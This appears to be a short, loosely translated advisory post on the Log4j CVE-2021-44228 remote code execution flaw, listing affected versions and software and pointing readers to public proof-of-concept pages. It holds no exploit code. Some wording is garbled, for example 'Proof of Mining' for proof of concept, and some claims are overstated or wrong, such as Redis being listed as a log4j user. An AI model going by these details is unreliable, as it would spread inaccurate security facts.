On December 9, 2021, a remote code execution (RCE) vulnerability in Apache log4j 2 was identified and identified with the code CVE-2021-44228. Public Proof of Mining (PoC) has been released and shows that mining is extremely easy to do. By sending a malicious request to a system vulnerable to Log4j an attacker can manipulate that system to download and then execute malicious code. Since this exploit has only been discovered recently, there are still many servers, whether physical or Cloud environments, that have yet to be patched. Like many high-severity RCE exploits, so far a large-scale hacker scan has begun on the internet with the aim of finding and exploiting unpatched systems. To fix the vulnerability from Log4j, you need to upgrade to the latest version of Apache log4j 2 (2.15.0-rc2) for all systems.
Log4j is a Java library and although the programming language is less popular with consumers these days, it is still very widely used in enterprise systems and web applications.
Currently, almost all Java applications use the Log4j library. Log4j is developed by the Apache Foundation and is widely used by both enterprise applications and cloud services.
Web applications and products from Apple, Amazon, Cloudflare, Twitter, and Steam are all vulnerable to RCE attacks that target this vulnerability.
Apache Log4j version affected
Apache Log4j 2.x <= 2.15.0-rc1
Affected software
Apache log4j 2 is an open source Java-based logging module, used in many Java applications around the world. Compared to the initial log4j 1.X release, log4j 2 resolved the issues with the previous release and provided a plugin architecture for users. On August 5, 2015, log4j 2 became major release and all users of previous log4j versions are recommended to upgrade to log4j 2. Apache log4j 2 is widely used in many popular software applications , such as Apache Struts, ElasticSearch, Redis, Kafka and others.
A significant number of Java based applications are using log4j as a logging utility and are very vulnerable to this CVE attack. Statistically, at least the following software may be affected:
- Apache Struts
- Apache Solr
- Apache Druid
- Apache Flink
- ElasticSearch
- Flume
- Apache Dubbo
- Logstash
- Kafka
- Spring-Boot-starter-log4j2
List of companies whose products are affected
You can click on each company name to see an image of the evidence of the Log4j . bug
Currently, there are some github pages sharing PoC, how to exploit Log4j vulnerability – CVE-2021-44228, if you want to research, you can find here